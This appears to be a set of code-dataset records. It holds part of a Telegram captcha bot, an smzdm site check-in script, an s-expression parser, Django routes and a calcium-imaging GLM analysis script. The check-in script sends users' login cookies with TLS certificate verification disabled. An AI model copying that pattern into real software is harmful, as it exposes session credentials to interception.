I bet {new_user} is a bot lol\\nAnd you know..\\nThere's space for \"\"\"\n + \"\"\"one bot here, and that's me.\\nHere's your test.\"\"\",\n f\"Yoo {new_user} wassup\\nCan ya solve da captcha?\",\n f\"{new_user} looking kinda sus, ngl.\\nProve us ur not the impostor.\",\n f\"\"\"嗨 {new_user},歡迎加入群。 請填寫驗證碼以驗證您是人類。 {time_string}\"\"\"\n + \"\"\"內不輸入驗證碼,會被自動踢出群。 在此之前,您將無法發送消息。 \"\"\"\n + \"\"\"這個組裡只有一個機器人,那個機器人就是我。\"\"\",\n ]\n return random.choice(welcome_message_replies)\n\n def get_reply(self, message: Optional[Message] = None) -> Optional[List[BotAction]]:\n \"\"\"Returns a reply that 'welcomes' a new user\"\"\"\n if message is None:\n return None\n if message.is_bot:\n return None\n expiration = CAPTCHA_EXPIRATION\n captcha_id = (\n str(message.chat_id)\n + \".\"\n + str(message.sender_id)\n + \".\"\n + str(message.message_id)\n + \".\"\n + str(int(datetime.datetime.utcnow().timestamp()))\n + \".\"\n + str(expiration)\n )\n captcha_text, captcha_image = self.captcha.get_captcha(captcha_id)\n bytes_io = BytesIO()\n bytes_io.name = \"captcha.jpeg\"\n captcha_image.save(bytes_io, \"JPEG\")\n bytes_io.seek(0)\n image_bytes = bytes_io.read()\n new_user = message.sender_name\n if message.sender_username is not None:\n new_user = \"@\" + message.sender_username\n welcome_message = self.get_welcome_message(new_user)\n inline_keyboard = self.get_keyboard(captcha_id, captcha_text)\n permissions = ChatPermissions(\n False, False, False, False, False, False, False, False\n )\n user_status_and_permissions = self.app.get_user_status_and_permissions(\n message.chat_id, message.sender_id\n )\n if (\n user_status_and_permissions is not None\n and user_status_and_permissions[0] == CHAT_MEMBER_STATUS_RESTRICTED\n ):\n self.permissions.set_user_permissions(\n message.sender_id, message.chat_id, user_status_and_permissions[1]\n )\n callback_manager_name = \"CaptchaTimeoutManager\"\n callback_manager_info = {\"captcha_id\": captcha_id}\n return [\n BotAction(\n BOT_ACTION_TYPE_REPLY_IMAGE,\n reply_text=welcome_message,\n reply_image=image_bytes,\n reply_inline_keyboard=inline_keyboard,\n reply_priority=BOT_ACTION_PRIORITY_HIGH,\n reply_callback_manager_name=callback_manager_name,\n reply_callback_manager_info=callback_manager_info,\n ),\n BotAction(\n BOT_ACTION_TYPE_RESTRICT_CHAT_MEMBER,\n reply_permissions=permissions,\n reply_ban_user_id=message.sender_id,\n reply_priority=BOT_ACTION_PRIORITY_HIGH,\n ),\n ]\n","repo_name":"hydrastro/sadbot","sub_path":"sadbot/commands/captcha_welcome.py","file_name":"captcha_welcome.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"18006292685","text":"# -*- coding: utf8 -*-\n\nimport requests, json, time, os\n\nrequests.packages.urllib3.disable_warnings()\n\ncookie = os.environ.get(\"cookie_smzdm\")\n\ndef main(*arg):\n try:\n msg = \"\"\n SCKEY = os.environ.get('SCKEY')\n s = requests.Session()\n s.headers.update({'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'})\n t = round(int(time.time() * 1000))\n url = f'https://zhiyou.smzdm.com/user/checkin/jsonp_checkin?_={t}'\n\n headers = {\n \"cookie\" : cookie,\n 'Referer': 'https://www.smzdm.com/'\n }\n\n r = s.get(url, headers=headers, verify=False)\n print(r.text.encode('latin-1').decode('unicode_escape'))\n if r.json()[\"error_code\"] != 0 and SCKEY:\n scurl = f\"https://sc.ftqq.com/{SCKEY}.send\"\n data = {\n \"text\" : \"smzdm 
Cookie过期\",\n \"desp\" : r.text\n }\n requests.post(scurl, data=data)\n print(\"smzdm cookie失效\")\n msg += \"smzdm cookie失效\"\n else:\n msg += \"smzdm签到成功\"\n except Exception as e:\n print('repr(e):', repr(e))\n msg += '运行出错,repr(e):'+repr(e)\n return msg + \"\\n\"\n\ndef smzdm_pc(*arg):\n msg = \"\"\n global cookie\n clist = cookie.split(\"\\n\")\n i = 0\n while i < len(clist):\n msg += f\"第 {i+1} 个账号开始执行任务\\n\"\n cookie = clist[i]\n msg += main(cookie)\n i += 1\n return msg\n\nif __name__ == \"__main__\":\n if cookie:\n print(\"----------什么值得买开始尝试签到----------\")\n smzdm_pc()\n print(\"----------什么值得买签到执行完毕----------\")\n\n \n","repo_name":"snhey/CheckinBox","sub_path":"smzdmCheckin/smzdmCheckinForSCF.py","file_name":"smzdmCheckinForSCF.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12056591202","text":"def lex(s):\n \"\"\"Lex a string into a list of tokens.\"\"\"\n return [read_token(t) for t in\n s.replace('(', ' ( ').replace(')', ' ) ').split()]\n\n\ndef read_token(t):\n \"\"\"Convert a token to an int if possible. Otherwise, return as is.\"\"\"\n try:\n return int(t)\n except ValueError:\n return t\n\n\ndef parse_list(tokens):\n \"\"\"Parse a list out of the tokens.\"\"\"\n res = []\n for t in tokens:\n if t == '(':\n res.append([])\n elif t == ')':\n lst = res.pop()\n if res:\n res[-1].append(lst)\n else:\n return lst\n else:\n res[-1].append(t)\n\n\ndef parse(tokens):\n \"\"\"Turn a list of tokens into a tree of symbols and numbers.\"\"\"\n t = tokens[0]\n return parse_list(tokens) if t == '(' else t\n\n\ndef read_string(s):\n \"\"\"Parse a string.\"\"\"\n return parse(lex(s))\n","repo_name":"welliam/toy-interpreter","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7631489924","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('',views.index,name='index'),\n path('department/',views.department,name='department'),\n path('course/',views.course,name='course'),\n path('past_question/',views.past_questions,name='past_questions'),\n path('past_detail/',views.past_details,name='past_detail'),\n path('about',views.about,name='about'),\n path('search',views.search,name='search')\n]","repo_name":"oladaniel97/past-question-site","sub_path":"business/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25033742906","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 26 14:31:34 2023\n\n \n (trial,1) = stim onset time\n (trial,2) = rule (Rule 1 or 2)\n (trial,3) = contingency (1: go stim, 0: nogo stim)\n (trial,4) = Lick (1: lick, 0: No lick)\n (trial,5) = Correct choice (1: correct, 0: incorrect)\n (trial,6) = stage info (1: Task, 0: Conditioning)\n\n@author: Jong Hoon Lee\n\"\"\"\n\n\"\"\" code updates:\n \n Sep 14 2022\n Allowing separation between conditions. 
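A usage note on the s-expression reader in the parse.py record above: it composes lex -> parse, with read_token converting ints and leaving everything else as a symbol string. A hypothetical check (inputs invented; the functions are the ones defined in that record):

# Assumes lex, read_token, parse_list, parse, read_string from parse.py above.
print(read_string("(+ 1 (* 2 3))"))            # ['+', 1, ['*', 2, 3]]
print(read_string("42"))                       # 42
print(read_string("(define (sq x) (* x x))"))
# ['define', ['sq', 'x'], ['*', 'x', 'x']]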
This is to see if the same neurons with \n action encoding in rule 1 shows in rule2 etc\n \n Sep 27 2022\n Major overhaul of code, including comments and separating analysis between\n across all trials and rule1 vs rule2\n\n \n Nov 09 2022\n C index determines how the code runs:\n 0 : Runs without trial history, across all rules\n -1 : Runs with trial history, across all rules\n [1,2] : Separates rule 1 and rule 2\n [-3,-4] : Separates rule 1 and rule 2 but includes trial history\n \n\"\"\"\n\n# import packages \n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom scipy import ndimage\nfrom scipy import stats\nfrom sklearn.linear_model import TweedieRegressor, Ridge, ElasticNet, Lasso\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.decomposition import PCA, SparsePCA\n\nfrom os.path import join as pjoin\nfrom numba import jit, cuda\n\n\n# from matplotlib.colors import BoundaryNorm\n\n# from sklearn.metrics import get_scorer_names, d2_tweedie_score, make_scorer\n\n\n# %% File name and directory\n\n# change fname for filename\n\n# fname = 'PPC_GLM_dataset_AllSession_FR_230209.mat'\nfname = 'CaData_all_withlicktime.mat'\nfdir = 'D:\\Python\\Data'\n# fname = 'GLM_dataset_220824_new.mat'\n\n\n# %% Helper functions for loading and selecting data\n# \n\n\nnp.seterr(divide = 'ignore') \ndef load_matfile(dataname = pjoin(fdir,fname)):\n \n MATfile = loadmat(dataname)\n D_ppc = MATfile['GLM_dataset']\n return D_ppc \n\ndef load_matfile_Ca(dataname = pjoin(fdir,fname)):\n \n MATfile = loadmat(dataname)\n D_ppc = MATfile['GLM_CaData']\n return D_ppc \n\n\ndef find_good_data():\n D_ppc = load_matfile()\n good_list = []\n for n in range(np.size(D_ppc,0)):\n S_all = np.zeros((1,max(D_ppc[n,2][:,0])+t_period+100))\n for sp in np.array(D_ppc[n,0]):\n if sp < np.size(S_all,1):\n S_all[0,sp[0]-1] = 1 #spike time starts at 1 but indexing starts at 0\n \n if np.mean(S_all)*1e3>1:\n good_list = np.concatenate((good_list,[n]))\n return good_list\n\n\ndef find_good_data_Ca(t_period):\n D_ppc = load_matfile_Ca()\n # good_list = np.arange(np.size(D_ppc,0))\n good_list = []\n t_period = t_period+prestim\n\n for n in range(np.size(D_ppc,0)):\n N_trial = np.size(D_ppc[n,2],0)\n \n \n # re-formatting Ca traces\n \n Y = np.zeros((N_trial,int(t_period/window)))\n for tr in range(N_trial):\n Y[tr,:] = D_ppc[n,0][0,int(D_ppc[n,2][tr,0])-1 \n - int(prestim/window): int(D_ppc[n,2][tr,0])\n + int(t_period/window)-1 - int(prestim/window)]\n if np.mean(Y) > 0.5:\n good_list = np.concatenate((good_list,[n]))\n \n \n return good_list\n\ndef sliding_median(arr, window):\n \n return np.median(np.lib.stride_tricks.sliding_window_view(arr, (window,)), axis=1)\n\n@jit(target_backend='cuda') \ndef import_data_w_spikes(n,prestim,t_period,window,c_ind):\n D_ppc = load_matfile()\n S_all = np.zeros((1,max(D_ppc[n,2][:,0])+t_period+100))\n L_all = np.zeros((1,max(D_ppc[n,2][:,0])+t_period+100))\n N_trial = np.size(D_ppc[n,2],0)\n \n # extracting spikes from data\n for sp in np.array(D_ppc[n,0]):\n if sp < np.size(S_all,1):\n S_all[0,sp[0]-1] = 1 #spike time starts at 1 but indexing starts at 0\n \n \n S = np.zeros((N_trial,t_period))\n S_pre = np.zeros((N_trial,prestim))\n for tr in range(N_trial):\n S[tr,:] = S_all[0,D_ppc[n,2][tr,0]-1:D_ppc[n,2][tr,0]+t_period-1]\n S_pre[tr,:] = S_all[0,D_ppc[n,2][tr,0]-prestim-1:D_ppc[n,2][tr,0]-1]\n \n # extracting spikes, end\n \n # extracting licks, the same way\n for l in 
np.array(D_ppc[n,1]):\n if l < np.size(L_all,1):\n L_all[0,l[0]-1] = 1 \n \n L = np.zeros((N_trial,t_period+prestim))\n for tr in range(N_trial):\n L[tr,:] = L_all[0,D_ppc[n,2][tr,0]-prestim-1:D_ppc[n,2][tr,0]+t_period-1]\n \n \n X = D_ppc[n,2][:,2:6] # task variables\n Y = [];\n Y2 = [];\n S = np.concatenate((S_pre,S),1)\n t_period = t_period+prestim\n \n \n if c_ind !=3:\n # remove conditioning trials \n S = np.concatenate((S[0:200,:],S[D_ppc[n,5][0][0]:,:]),0)\n X = np.concatenate((X[0:200,:],X[D_ppc[n,5][0][0]:,:]),0)\n L = np.concatenate((L[0:200,:],L[D_ppc[n,5][0][0]:,:]),0)\n\n # only contain conditioningt trials\n else:\n S = S[201:D_ppc[n,5][0][0]]\n X = X[201:D_ppc[n,5][0][0]]\n\n\n N_trial2 = np.size(S,0)\n\n # select analysis and model parameters with c_ind \n \n if c_ind == -1: \n # Adding previous trial correct vs wrong\n Xpre = np.concatenate(([0],X[0:-1,2]*X[0:-1,1]),0)\n Xpre = Xpre[:,None]\n X = np.concatenate((X,Xpre),1)\n X2 = X\n elif c_ind ==-2:\n Xpre = np.concatenate(([0],X[0:-1,2]*X[0:-1,1]),0)\n Xpre = Xpre[:,None] \n # X2 = np.column_stack([X[:,0],(X[:,0]-1)*-1,\n # X[:,3],(X[:,3]-1)*-1,\n # X[:,2]*X[:,1],Xpre])\n X2 = np.column_stack([X[:,0],X[:,3],\n X[:,2]*X[:,1],Xpre]) \n \n \n \n L2 = []\n for w in range(int(t_period/window)):\n l = np.sum(L[:,range(window*w,window*(w+1))],1)\n L2 = np.concatenate((L2,l))\n y = np.mean(S[:,range(window*w,window*(w+1))],1)*1e3\n y2 = np.sum(S[:,range(window*w,window*(w+1))],1)\n Y = np.concatenate((Y,y))\n Y2 = np.concatenate((Y2,y2))\n \n Y = np.reshape(Y,(int(t_period/window),N_trial2)).T\n Y2 = np.reshape(Y2,(int(t_period/window),N_trial2)).T\n L2 = np.reshape(L2,(int(t_period/window),N_trial2)).T\n return X2, Y, Y2, L2\n\ndef import_data_w_Ca(D_ppc,n,prestim,t_period,window,c_ind):\n # D_ppc = load_matfile_Ca()\n \n \n L_all = np.zeros((1,int(np.floor(D_ppc[n,3][0,max(D_ppc[n,2][:,0])]*1e3))+t_period+100))\n N_trial = np.size(D_ppc[n,2],0)\n \n # extracting licks, the same way\n for l in np.floor(D_ppc[n,1]*1e3):\n l = int(l) \n if l < np.size(L_all,1):\n L_all[0,l-1] = 1 \n \n L = np.zeros((N_trial,t_period+prestim))\n for tr in range(N_trial):\n stim_onset = int(np.round(D_ppc[n,3][0,D_ppc[n,2][tr,0]]*1e3))\n lick_onset = int(np.round(D_ppc[n,3][0,D_ppc[n,2][tr,3]]*1e3))\n lick_onset = lick_onset-stim_onset\n L[tr,:] = L_all[0,stim_onset-prestim-1:stim_onset+t_period-1]\n \n # reformatting lick rates\n L2 = []\n for w in range(int((t_period+prestim)/window)):\n l = np.sum(L[:,range(window*w,window*(w+1))],1)\n L2 = np.concatenate((L2,l)) \n \n L2 = np.reshape(L2,(int((t_period+prestim)/window),N_trial)).T\n\n\n X = D_ppc[n,2][:,2:6] # task variables\n Rt = D_ppc[n,5] # reward time relative to stim onset, in seconds\n t_period = t_period+prestim\n \n # re-formatting Ca traces\n Yraw = {}\n Yraw = D_ppc[n,0]\n \n \n \n # Yraw2 = ndimage.median_filter(Yraw, size = 3000)\n # Y_median = sliding_median(Yraw[0,:],200)\n Yraw2 = np.concatenate((np.flip(Yraw[0,0:3000],0),Yraw[0,:],Yraw[0,-3000:-1]),0)\n sliding_w= np.lib.stride_tricks.sliding_window_view(np.arange(np.size(Yraw,1)+6000), 6000)\n Ymed_wind = np.zeros((1,np.size(Yraw,1)))\n for s in np.arange(np.size(Yraw,1)):\n Ymed_wind[0,s] = np.median(Yraw2[sliding_w[s,:]])\n \n Yraw3 = Yraw-Ymed_wind+np.mean(Yraw)\n \n # fig, axes = plt.subplots(1,1)\n # axes.plot(np.arange(85141),ndimage.gaussian_filter(Yraw[0,:],1000))\n # axes.plot(np.arange(85141),ndimage.gaussian_filter(Yraw3[0,:],1000)) \n \n # Yraw[0,100:-99] = (Yraw[0,100:-99]-Y_median)/Y_median\n \n Y = 
np.zeros((N_trial,int(t_period/window)))\n for tr in range(N_trial):\n Y[tr,:] = Yraw3[0,D_ppc[n,2][tr,0]-1 - int(prestim/window): D_ppc[n,2][tr,0] + int(t_period/window)-1 - int(prestim/window)]\n \n \n # for t in np.arange(int(t_period/window)):\n # Y[:,t] = Y[:,t]- np/median(Y[:,t])\n\n\n \n # select analysis and model parameters with c_ind\n \n if c_ind != 3: \n # remove conditioning trials \n Y = np.concatenate((Y[0:200,:],Y[D_ppc[n,4][0][0]:,:]),0)\n X = np.concatenate((X[0:200,:],X[D_ppc[n,4][0][0]:,:]),0)\n L2 = np.concatenate((L2[0:200,:],L2[D_ppc[n,4][0][0]:,:]),0)\n else:\n # only contain conditioning trials \n Y = Y[201:D_ppc[n,4][0][0]]\n X = X[201:D_ppc[n,4][0][0]]\n L2 = L2[201:D_ppc[n,4][0][0]]\n\n \n # Add reward history\n Xpre = np.concatenate(([0],X[0:-1,2]*X[0:-1,1]),0)\n Xpre = Xpre[:,None]\n Xpre2 = np.concatenate(([0,0],X[0:-2,2]*X[0:-2,1]),0)\n Xpre2 = Xpre2[:,None]\n # Add reward instead of action\n X2 = np.column_stack([X[:,0],X[:,3],\n X[:,2]*X[:,1],Xpre]) \n\n \n\n \n return X2,Y, L2, Rt\n \n# %% Main function for GLM\n# %% glm_per_neuron function code\n\ndef glm_per_neuron(n,t_period,prestim,window,k,c_ind,ca, m_ind,fig_on): \n # if using spike data\n if ca == 0:\n X, Y, Y2,L = import_data_w_spikes(n,prestim,t_period,window,c_ind)\n else:\n # if using Ca data\n X, Y, L, Rt = import_data_w_Ca(D_ppc,n,prestim,t_period,window,c_ind)\n Y2 = Y\n \n \n t_period = t_period+prestim\n Yhat = [];\n Yhat1 = [];\n Yhat2 = [];\n TT2 = [];\n Intercept = [];\n CI2 = [];\n score = [];\n N_trial2 = np.size(X,0)\n\n \n # reg = TweedieRegressor(power = 0, alpha = 0)\n reg = ElasticNet(alpha = 4*1e-2, l1_ratio = 0.5) #Using a linear regression model with Ridge regression regulator set with alpha = 1\n # reg = Ridge(alpha = 4*1e-2)\n for w in range(int(t_period/window)):\n y = Y2[:,w]\n # l = L[:,w]*0\n # X2 = np.column_stack([np.ones_like(y),X[:,0],l,X[:,2:]])\n # X = np.column_stack([X[:,0],l,X[:,2:]])\n # X3 = np.column_stack([l,X])\n X3 = X\n Xm = np.zeros_like(X3)\n Xm[:,m_ind] = 1\n X3 = X3*Xm\n # adding kernels to each task variable\n if w*window <= prestim-window:\n X3[:,0:3] = 0;\n elif w*window <= prestim+1500-window:\n \n if ca == 0:\n X3[:,2]= 0;\n elif ca == 1:\n for tr in np.arange(np.size(L,0)):\n if np.isnan(Rt[tr,0]):\n X3[tr,2] = 0;\n else:\n if w*window <= prestim + Rt[tr,0]*1e3 -window:\n X3[tr,2] = 0;\n \n \n\n \n \n \n X2 = np.column_stack([np.ones_like(y),X3])\n ss= ShuffleSplit(n_splits=k, test_size=0.20, random_state=0)\n y2 = ndimage.gaussian_filter(y,0)\n cv_results = cross_validate(reg, X3, y2, cv = ss , \n return_estimator = True, \n scoring = 'explained_variance')\n theta = np.zeros((np.size(X2,1)-1,k))\n inter = np.zeros((1,k))\n pp = 0\n for model in cv_results['estimator']:\n theta[:,pp] = model.coef_ \n inter[:,pp] = model.intercept_\n pp = pp+1\n theta3 = np.concatenate((np.mean(inter,1),np.mean(theta,1)))\n yhat = X2 @theta3\n yhat1 = X2[0:200,:] @ theta3\n yhat2 = X2[200:,:] @ theta3\n \n \n score = np.concatenate((score, cv_results['test_score']))\n TT2 = np.concatenate((TT2,np.mean(theta,1)))\n Intercept = np.concatenate((Intercept,np.mean(inter,1)))\n CI2 = np.concatenate((CI2,stats.sem(theta,1)))\n\n Yhat = np.concatenate((Yhat,yhat))\n # Yhat1 = np.concatenate((Yhat1,yhat1))\n # Yhat2 = np.concatenate((Yhat2,yhat2))\n \n \n Yhat = np.reshape(Yhat,(int(t_period/window),N_trial2)).T\n # Yhat1 = np.reshape(Yhat1,(int(t_period/window),N_trial2)).T\n # Yhat2 = np.reshape(Yhat2,(int(t_period/window),N_trial2)).T\n \n \n TT2 = 
np.reshape(TT2,(int(t_period/window),np.size(X3,1))).T\n CI2 = np.reshape(CI2,(int(t_period/window),np.size(X3,1))).T\n score = np.reshape(score,(int(t_period/window),k))\n \n \n \n \n # Figures\n if fig_on ==1:\n fig, ((ax1, ax2),(ax3,ax4)) = plt.subplots(2,2,figsize=(10, 10))\n \n \n if c_ind == 0:\n cmap = ['tab:purple', 'tab:orange', 'tab:green','tab:blue']\n clabels = [\"contin\",\"action\",\"correct\",\"stim\"]\n elif c_ind == -1:\n cmap = ['tab:purple', 'tab:orange', 'tab:green','tab:blue','tab:olive']\n clabels = [\"contin\",\"action\",\"correct\",\"stim\",\"history\"]\n elif c_ind == -2:\n cmap = ['tab:purple','tab:blue','tab:red','tab:orange']\n clabels = [\"Contingency\",\"stim\",\"reward\",\"history\",]\n lstyles = ['solid','solid','solid','solid']\n\n # cmap = ['tab:orange','tab:purple','tab:blue','tab:red','tab:olive','tab:olive']\n # clabels = [\"lick\",\"Contingency\",\"stim\",\"reward\",\"history\",\"history2\"]\n # lstyles = ['solid','solid','solid','solid','solid','dashed']\n\n \n \n \n x_axis = np.arange(1,t_period,window)\n for c in range(np.size(X3,1)): \n ax2.plot(x_axis,ndimage.gaussian_filter(TT2[c,:],2),linewidth = 2.0,\n color = cmap[c], label = clabels[c], linestyle = lstyles[c])\n ax2.fill_between(x_axis,(ndimage.gaussian_filter(TT2[c,:],2) - CI2[c,:]),\n (ndimage.gaussian_filter(TT2[c,:],2 )+ CI2[c,:]), color=cmap[c], alpha = 0.2)\n \n # ax2.legend(loc = 'upper right')\n \n # e_lines = np.array([0,500,500+int(D_ppc[n,3]),2500+int(D_ppc[n,3])])\n e_lines = np.array([0,500,500+1000,2500+1000])\n e_lines = e_lines+prestim\n \n \n ax2.vlines(x =e_lines, \n ymin = np.amin(ndimage.gaussian_filter(TT2,sigma = [0,3])), \n ymax = np.amax(ndimage.gaussian_filter(TT2,sigma = [0,3])),\n linestyles = 'dashed',\n colors = 'black', \n linewidth = 2.0)\n \n ax4.plot(x_axis,ndimage.gaussian_filter(np.mean(score,1)*1e2,1))\n \n var_top = min(max(ndimage.gaussian_filter(np.mean(score,1)*1e2,1)),100)\n \n # Plotting firing rates for one condition VS the other\n # 0 : contingency \n # 1 : lick vs no lick\n # 2 : correct vs wrong\n # 3 : stim 1 vs stim 2\n # if c_ind ==0:\n # # stim_ind = X3[:,3] == 1 \n # else:\n stim_ind1 = X3[:,2] == 1 \n stim_ind2 = X3[:,2] == 0 \n \n \n ax1.plot(x_axis,ndimage.gaussian_filter(np.mean(Y[stim_ind1,:],0),2),\n linewidth = 2.0, color = cmap[2],label = 'Reward',linestyle = lstyles[3])\n ax1.plot(x_axis,ndimage.gaussian_filter(np.mean(Y[stim_ind2,:],0),2),\n linewidth = 2.0, color = cmap[2],label = 'No Reward',linestyle = lstyles[3])\n ax1.set_title('Firing rate y')\n ax1.legend(loc = 'upper right')\n \n \n # ax3.plot(x_axis,ndimage.gaussian_filter(np.mean(Yhat[stim_ind1,:],0),2),\n # linewidth = 2.0, color = cmap[3],linestyle = lstyles[3])\n # ax3.plot(x_axis,ndimage.gaussian_filter(np.mean(Yhat[stim_ind2,:],0),2),\n # linewidth = 2.0, color = cmap[3],linestyle = lstyles[4]) \n # ax3.set_title('Prediction y_hat')\n \n ax2.set_title('unit_'+str(n+1))\n ax4.set_title('explained variance')\n ax4.set_ylim(bottom = -2, top = var_top)\n plt.show()\n Model_Theta = TT2\n \n return X3, Y, Yhat, Model_Theta, score, Intercept\n\n# %% Main\n \n\n\n# %% Model analysis, categorizing each neuron\n\"\"\" \nData{score} = 100 by k\nData{coef} = n_x by 100 where n_x is the number of variables\nwindow2 : score and weight coefs are binned by a moving window \n with step size bin_size and window size window2 \n\nOUTPUT\nmax_ind : best index for peak of score(explained variance) (not in ms)\nbest_score : average score at max_ind\ncoef : Weight coefficients at 
max_ind\nmodel_mean : Weight coefficients across t_period\n \n\"\"\"\ndef Model_analysis(n,window, window2,Data,c_ind,ana_period):\n \n # time currently defined by window size* data size. ana_period should also be defined thus \n bin_size = int(window2/window)\n ana_bin = ana_period/(window2/2)\n\n Dat_length = np.size(Data[n,c_ind-1][\"score\"],0)\n Model_Theta = Data[n,c_ind-1][\"coef\"]/(np.max(np.abs(Data[n,c_ind-1][\"coef\"]))+1) # Soft normalization\n\n score_mean = np.zeros((1,2*int(Dat_length/bin_size)))\n score_pool = np.zeros((np.size(Data[n,c_ind-1][\"score\"],1),2*int(Dat_length/bin_size)))\n score_var = np.zeros((1,2*int(Dat_length/bin_size)))\n model_mean = np.zeros((np.size(Model_Theta,0),2*int(Dat_length/bin_size)))\n \n k = 0;\n for ind in np.arange(0,Dat_length-bin_size/2,int(bin_size/2)):\n ind = int(ind)\n score_pool[:,k] = np.mean(Data[n,c_ind-1][\"score\"][ind:ind+bin_size,:],0)\n score_mean[0,k] = np.mean(Data[n,c_ind-1][\"score\"][ind:ind+bin_size,:])\n score_var[0,k] = np.var(Data[n,c_ind-1][\"score\"][ind:ind+bin_size,:])\n model_mean[:,k] = np.mean(np.abs(Model_Theta[:,ind:ind+bin_size]),1)\n k = k+1\n \n max_ind = np.argmax(score_mean[0,int(ana_bin[0]):int(ana_bin[1])]) + int(ana_bin[0])\n best_score = score_mean[0,max_ind]\n coef = model_mean[:,max_ind]\n \n \n return max_ind, best_score, coef, model_mean, score_mean, score_var, score_pool\n\n# %% \n\nNvar = 4\n\ndef build_model(n, t_period, prestim, window,k,c_ind,ca):\n for m_ind in np.arange(Nvar):\n X, Y, Yhat, Model_Theta, score, intercept = glm_per_neuron(n, t_period, prestim, window,k,c_ind,ca,m_ind,0)\n Data[n,c_ind-1] = {\"coef\" : Model_Theta, \"score\" : score, 'Y' : Y,'Yhat' : Yhat}\n mi, bs, coef,beta_weights,mean_score, var_score,score_pool = Model_analysis(n, window, window2, Data,c_ind,ana_period)\n S[0,m_ind] = mean_score[0,mi]\n mean_score[mean_score DataS[n,c_ind-1,np.argmax(S)][\"var_score\"]):\n for m_ind in np.arange(Nvar):\n m_ind2 = np.unique(np.append(maxS,m_ind))\n X, Y, Yhat, Model_Theta, score, intercept = glm_per_neuron(n, t_period, prestim, window,k,c_ind,ca,m_ind2,0)\n Data[n,c_ind-1] = {\"coef\" : Model_Theta, \"score\" : score, 'Y' : Y,'Yhat' : Yhat}\n mi, bs, coef,beta_weights,mean_score, var_score ,score_pool = Model_analysis(n, window, window2, Data,c_ind,ana_period)\n S[0,m_ind] = mean_score[0,mi]\n mean_score[mean_score 179\n\nd_list3 = good_list <= 179\n\nax_sz = 4\n\ngood_list_sep = good_list[d_list3]\n\n# Rscore = {}\nRscore = np.zeros((ax_sz+1,np.size(good_list)))\n \ny_lens = np.arange(160)\n \nfor n in np.arange(np.size(good_list,0)):\n # print(n)\n nn = good_list[n]\n nn = int(nn)\n maxS = Data[nn,c_ind-1][\"maxS\"]\n try:\n X = Data[nn,c_ind-1][\"X\"]\n intercept = Data[nn,c_ind-1][\"intercept\"]\n\n except: \n X, Y, Yhat, Model_Theta, score, intercept = glm_per_neuron(nn, t_period, prestim, window,k,c_ind,ca,maxS,1)\n Data[nn,c_ind-1] = {\"X\" : X,\"coef\" : Model_Theta, \"intercept\" : intercept, \"score\" : score, 'Y' : Y,'Yhat' : Yhat, 'maxS' : maxS}\n \n Y = Data[nn,c_ind-1][\"Y\"][:,y_lens]\n Yhat = Data[nn,c_ind-1][\"Yhat\"][:,y_lens]\n Model_Theta = Data[nn,c_ind-1][\"coef\"]\n ymean = np.ones((len(y_lens),np.size(X,0))).T*Data[nn,c_ind-1][\"intercept\"][y_lens]\n # ymean[0,:] = intercept\n \n theta3 = np.concatenate(([ymean[0,:]],Model_Theta[:,y_lens]),0)\n X2 = np.concatenate((np.ones((np.size(X,0),1)),X),1)\n \n for f in np.arange(ax_sz):\n yhat2 = X2[:,[0,f+1]] @ theta3[[0,f+1],:]\n Rscore[f,n] = 1- np.sum(np.square(Y-yhat2))/np.sum(np.square(Y-ymean))\n 
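Each Rscore[f, n] computed in the surrounding loop is an explained-variance statistic: residuals of a one-regressor prediction compared against residuals of a baseline prediction (the fitted intercept in this script). A stand-alone sketch with toy numbers, using the data mean as the baseline for simplicity:

import numpy as np

y = np.array([1.0, 2.0, 3.0, 4.0])       # toy observed trace
yhat = np.array([1.1, 1.9, 3.2, 3.8])    # toy partial-model prediction
ybase = np.full_like(y, y.mean())        # baseline (intercept-only model)

r2 = 1 - np.sum((y - yhat) ** 2) / np.sum((y - ybase) ** 2)
print(r2)  # ~0.98 for these numbers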
if Rscore[f,n] ==0:\n Rscore[f,n] = -1\n \n Rscore[ax_sz,n] = 1- np.sum(np.square(Y-Yhat))/np.sum(np.square(Y-ymean))\n # Rscore[c_ind][:,n] \n\n# scatter_ind = [np.arange(ax_sz+1)]*np.ones((ax_sz+1,len(good_list))).T\n# scatter_ind = scatter_ind.T\n\n# %% plot R score\n\n\ncmap = ['tab:purple','tab:blue','tab:red','tab:orange']\nc_ind = -1\n\nd_list = good_list > 179\n# \nd_list3 = good_list <= 179\n# d_list3 = good_list > 179\n\n\ndef make_RS(d_list):\n fig, axes = plt.subplots(1,1, figsize = (10,8))\n Rsstat = {}\n for f in np.arange(0,ax_sz):\n Rs = Rscore[f,d_list]\n Rmax = Rscore[4,d_list]\n Rmax = Rmax[Rs>0.01]\n Rs = Rs[Rs>0.01]\n \n # Rs = Rs/(Rmax+0.03)\n Rsstat[c_ind,f] = Rs\n axes.scatter(np.ones_like(Rs)*(f+(c_ind+1)*-0.3),Rs,c = cmap[f])\n axes.scatter([(f+(c_ind+1)*-0.3)],np.mean(Rs),c = 'k',s = 500, marker='_')\n # axes.boxplot(Rs,positions= [f+(c_ind+1)*-0.3])\n axes.scatter(np.ones_like(Rscore[4,d_list])*(4+(c_ind+1)*-0.3),Rscore[4,d_list])\n axes.scatter([(4+(c_ind+1)*-0.3)],np.mean(Rscore[4,d_list]),c = 'k',s = 500, marker='_')\n \n Rsstat[c_ind,4] = Rscore[4,d_list]\n \n # axes.boxplot(Rscore[c_ind][4,d_list3],positions= [4+(c_ind+1)*-0.3])\n axes.set_ylim([-0.05,0.2])\n\n return 